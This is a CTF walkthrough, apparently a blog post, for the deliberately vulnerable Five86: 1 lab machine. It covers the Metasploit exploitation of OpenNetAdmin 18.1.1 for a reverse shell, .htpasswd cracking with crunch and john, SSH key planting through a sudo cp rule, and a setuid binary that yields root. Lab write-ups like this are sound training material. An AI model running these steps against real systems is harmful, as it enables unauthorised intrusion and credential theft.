Five86: 1 Walkthrough (VulnHub CTF)

Vulnhub CTF

Today we are solving Five86: 1, created by DCAU. This VM is a purposely built vulnerable lab intended for gaining experience in penetration testing.

Download Five86: 1 from VulnHub.

Network Scanning

Our first step is to identify the target's IP address; we start with netdiscover on the local network.

netdiscover

Next, an Nmap aggressive scan of the target (-A enables OS detection, version detection, default scripts and traceroute). Note that -A by itself only covers Nmap's default top 1000 ports; add -p- if you want every port checked. We see three open ports: 22 (SSH), 80 (HTTP) and 10000 (Webmin httpd).

nmap -A 192.168.1.7
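As an added example (not part of the original walkthrough), here is the two-stage scan a practitioner would run instead of trusting -A's default port range: a full-port scan written to grepable output, then a parser that pulls the open TCP ports out of that file and builds the targeted -A follow-up command. The -oG text below is constructed to resemble a result for this target; the SSH banner is a placeholder, not the real one.

```python
# Constructed nmap -oG output for the target above; the banner text is a
# placeholder, not the real scan result.
SAMPLE_GNMAP = (
    "# Nmap scan initiated as: nmap -p- -oG full.gnmap 192.168.1.7\n"
    "Host: 192.168.1.7 ()\tStatus: Up\n"
    "Host: 192.168.1.7 ()\tPorts: 22/open/tcp//ssh//OpenSSH (placeholder banner)/, "
    "80/open/tcp//http///, 10000/open/tcp//http///, 111/filtered/tcp//rpcbind///"
    "\tIgnored State: closed (65531)\n"
)


def open_tcp_ports(gnmap: str) -> dict:
    """Map host -> [(port, service, version)] for every TCP port reported open.

    The Ports: field of grepable output is a comma-separated list of
    port/state/protocol/owner/service/rpc-info/version/ records. The version
    text may itself contain slashes, so only the first six slashes are split on.
    """
    found: dict = {}
    for line in gnmap.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # fields in -oG output are tab-separated; keep only the Ports: field
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for record in ports_field.split(","):
            parts = record.strip().split("/", 6)
            if len(parts) < 6:
                continue
            port, state, proto, _owner, service, _rpc = parts[:6]
            version = parts[6].rstrip("/") if len(parts) > 6 else ""
            if state == "open" and proto == "tcp":
                found.setdefault(host, []).append((int(port), service, version))
    return found


def followup_command(host: str, ports) -> str:
    """Build the targeted -A scan for just the ports the full scan found open."""
    plist = ",".join(str(p) for p, _, _ in sorted(ports))
    return f"nmap -A -p{plist} {host}"


if __name__ == "__main__":
    for host, ports in open_tcp_ports(SAMPLE_GNMAP).items():
        for port, service, version in ports:
            print(f"{host} {port}/tcp {service} {version}".rstrip())
        print(followup_command(host, ports))
```

Running the full scan first (nmap -p- -oG full.gnmap target) and then only the -A follow-up on the ports it found keeps the slow script and version probing to the ports that matter, and it would catch a service listening above port 1000 that a bare -A misses.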

Enumeration

To enumerate the HTTP service on port 80, we open the target's IP address in a web browser.

We find an /ona directory, which looks like an OpenNetAdmin install. The About page gives the OpenNetAdmin version (v18.1.1).

http://192.168.1.7/ona

Searching Exploit-DB for OpenNetAdmin v18.1.1 turns up a command injection exploit (EDB-ID 47772, written as a Metasploit module), which we download to our local machine.


To add the exploit to Metasploit, copy it from the Downloads directory into the Metasploit modules tree (copying it to ~/.msf4/modules/exploits/ instead survives framework updates and only needs a reload_all inside msfconsole), start msfconsole, load the module, set RHOSTS to the target and LHOST to our own address, and run it.

cp /root/Downloads/47772.rb /usr/share/metasploit-framework/modules/exploits/
msfconsole
use exploit/47772
set rhosts 192.168.1.7
set lhost 192.168.1.4
run

Session 1 opens: we have a reverse connection from the target.


The shell we get is not a proper TTY, so we upgrade it with the Python pty one-liner. Since this machine has Python 3, we use the python3 form of the one-liner; id then confirms we are running as www-data.

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
id

ls -lsa lists every file, including hidden ones; there is a .htpasswd file in the web directory, which we read.

ls -lsa
cat .htpasswd

Privilege Escalation

Save the hash from .htpasswd into a file named hash on our attacking machine and confirm its contents:

cat hash

Create a wordlist with crunch: length exactly 10, using only the characters hinted for the password (a, e, f, h, r, t). That keyspace is 6^10, about 60 million candidates and roughly 665 MB on disk; piping crunch straight into john with --stdin avoids writing the file at all.

crunch 10 10 aefhrt >word.txt

Now try to crack the hash with john using the custom wordlist:

john --wordlist=word.txt hash
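Added example, not from the original post: before handing an .htpasswd hash to john, identify its scheme, because the john --format (or hashcat mode) depends on it, and generate the crunch keyspace lazily rather than writing it to disk. The functions below parse .htpasswd entries, classify the hash, count the keyspace the crunch command above produces, and, for the unsalted {SHA} scheme that the standard library can compute, crack it directly. Apache's $apr1$ scheme is deliberately left to john (--format=md5crypt) or hashcat (-m 1600). The sample entry is constructed with a made-up user and a short 4-character password from the same charset so the demo finishes in well under a second.

```python
import base64
import hashlib
import itertools
from typing import Iterator, List, Optional, Tuple


def parse_htpasswd(text: str) -> List[Tuple[str, str]]:
    """Return (user, hash) pairs from .htpasswd content, skipping comments and blanks."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, hashval = line.partition(":")
        if sep:
            entries.append((user, hashval))
    return entries


def scheme_of(hashval: str) -> str:
    """Classify an .htpasswd hash so the right john --format / hashcat -m is chosen."""
    if hashval.startswith("$apr1$"):
        return "apr1"      # Apache MD5 (htpasswd -m): john --format=md5crypt, hashcat -m 1600
    if hashval.startswith("{SHA}"):
        return "sha1"      # base64(SHA-1(password)), unsalted (htpasswd -s)
    if hashval.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"    # htpasswd -B: john --format=bcrypt, hashcat -m 3200
    if len(hashval) == 13:
        return "descrypt"  # legacy crypt(3) (htpasswd -d): john --format=descrypt, hashcat -m 1500
    return "unknown"


def keyspace(charset: str, length: int) -> int:
    """Number of candidates crunch emits for a fixed length over a charset."""
    return len(set(charset)) ** length


def wordlist_bytes(charset: str, length: int) -> int:
    """Size of the file crunch writes: each candidate plus a newline."""
    return keyspace(charset, length) * (length + 1)


def candidates(charset: str, length: int) -> Iterator[str]:
    """The same keyspace as crunch <len> <len> <charset>, generated lazily."""
    for combo in itertools.product(charset, repeat=length):
        yield "".join(combo)


def sha1_entry(password: str) -> str:
    """Hash a password the way htpasswd -s stores it."""
    digest = hashlib.sha1(password.encode()).digest()
    return "{SHA}" + base64.b64encode(digest).decode()


def crack(hashval: str, charset: str, length: int) -> Optional[str]:
    """Brute-force a {SHA} entry over the crunch-style keyspace.

    Other schemes are salted and/or slow by design; raise so the caller hands
    them to john or hashcat with the format named in scheme_of().
    """
    scheme = scheme_of(hashval)
    if scheme != "sha1":
        raise ValueError(f"{scheme} hash: use john/hashcat, not this script")
    for pw in candidates(charset, length):
        if sha1_entry(pw) == hashval:
            return pw
    return None


# Constructed sample: a made-up user with a 4-character password drawn from the
# page's charset, so the demo runs quickly (6**4 = 1296 candidates).
SAMPLE_HTPASSWD = "# constructed for the example\ndemo:" + sha1_entry("heat") + "\n"


if __name__ == "__main__":
    print(f"crunch 10 10 aefhrt -> {keyspace('aefhrt', 10)} candidates, "
          f"about {wordlist_bytes('aefhrt', 10) / 1e6:.0f} MB on disk")
    for user, hashval in parse_htpasswd(SAMPLE_HTPASSWD):
        print(user, scheme_of(hashval), crack(hashval, "aefhrt", 4))
```

The point of scheme_of() is the format choice: john autodetects most .htpasswd schemes, but when it guesses wrong (or when you switch to hashcat) the mode numbers in the comments are the ones to use, and a 10-character unsalted {SHA} hash would fall in seconds where an $apr1$ one needs the full 60 million iterations of MD5-crypt's 1000-round loop.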

The hash cracks. We switch the shell from www-data to douglas with su and log in successfully with douglas's credentials.

su douglas

Run sudo -l to see what douglas is allowed to run with sudo: /bin/cp can be run as the user jen.

sudo -l

Generate an SSH key pair as douglas on the target (it is written to /home/douglas/.ssh/).

ssh-keygen -b 2048

Copy the public key to the target's /tmp directory under the name authorized_keys.

cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys

Make the file readable to jen (world-readable, 644, is enough; the 777 used here is more than needed) and use the sudo rule to copy it, as jen, into /home/jen/.ssh/. Because cp creates the destination as jen with jen's umask, the copied file is owned by jen and is not group- or world-writable, which is what sshd's StrictModes check requires.

cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/

Now SSH as jen works without a password, using douglas's private key from the douglas shell.

ssh jen@192.168.1.7
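Added example (not from the walkthrough): why the chmod 777 on /tmp/authorized_keys is harmless, but the same mode on the copy in /home/jen/.ssh/ would lock you out. sshd's StrictModes check refuses an authorized_keys file, or any directory between it and the home directory, that is group- or world-writable or owned by anyone other than the user or root. The function below approximates that rule (it is a re-implementation for illustration, not sshd's code), and demo_checks() exercises it on a throwaway home directory it builds itself under the system temp directory, using whatever uid the current process has.

```python
import os
import stat
import tempfile
from typing import Optional, Tuple


def strict_modes_problem(authorized_keys: str, home: str, uid: int) -> Optional[str]:
    """Approximate sshd's StrictModes check for an authorized_keys file.

    Returns None if the file would be accepted, otherwise a description of the
    first path that fails. The rule: the file and every directory from it up
    to and including the home directory must be owned by the user or root and
    must not be group- or world-writable (mode & 022 == 0).
    """
    path = os.path.realpath(authorized_keys)
    home = os.path.realpath(home)
    st = os.stat(path)
    if not stat.S_ISREG(st.st_mode):
        return f"{path}: not a regular file"
    while True:
        st = os.stat(path)
        if st.st_uid not in (uid, 0):
            return f"{path}: owned by uid {st.st_uid}, not uid {uid} or root"
        if st.st_mode & 0o022:
            return f"{path}: group/world writable ({stat.filemode(st.st_mode)})"
        if path in (home, "/"):
            return None          # reached the home directory: everything passed
        path = os.path.dirname(path)


def demo_checks() -> Tuple[bool, bool, bool]:
    """Build a throwaway home directory and show what sshd would do with three layouts."""
    uid = os.getuid()
    base = tempfile.mkdtemp(prefix="jen-home-")      # constructed, not a real user
    home = os.path.join(base, "jen")
    ssh_dir = os.path.join(home, ".ssh")
    keyfile = os.path.join(ssh_dir, "authorized_keys")
    os.mkdir(home, 0o755)
    os.mkdir(ssh_dir, 0o700)
    with open(keyfile, "w") as fh:
        fh.write("ssh-rsa AAAA constructed-placeholder-key douglas@five86\n")

    os.chmod(keyfile, 0o777)            # what the walkthrough did to the copy in /tmp
    rejected_777 = strict_modes_problem(keyfile, home, uid) is not None

    os.chmod(keyfile, 0o644)            # what cp leaves behind under a 022 umask
    accepted_644 = strict_modes_problem(keyfile, home, uid) is None

    os.chmod(ssh_dir, 0o775)            # a group-writable .ssh directory is just as fatal
    rejected_dir = strict_modes_problem(keyfile, home, uid) is not None
    return rejected_777, accepted_644, rejected_dir


if __name__ == "__main__":
    print(demo_checks())  # (True, True, True)
```

The practical lesson for this kind of privilege escalation: the modes on the staging copy in /tmp never matter to sshd, only the modes and ownership of the final file and its parent directories do, so a cp that runs as the target user (as the sudo rule here allows) produces exactly the file sshd will accept. If the login had failed, the "Authentication refused: bad ownership or modes" line in the target's auth log is where to look.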

After some more directory enumeration, we find a mail message for jen in /var/mail.

cd /var/mail
ls
cat jen

The mail contains moss's password, so we switch from jen to moss with su. A search of /home for setuid files (find -perm -u=s; searching / instead would cover the whole system) turns up /home/moss/.games/upyourgame, a setuid binary. Running it drops us into a root shell, and we read the flag from /root.

su moss
find /home -type f -perm -u=s 2>/dev/null
cd /home/moss/.games/
./upyourgame
cd /root
cat flag.txt

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
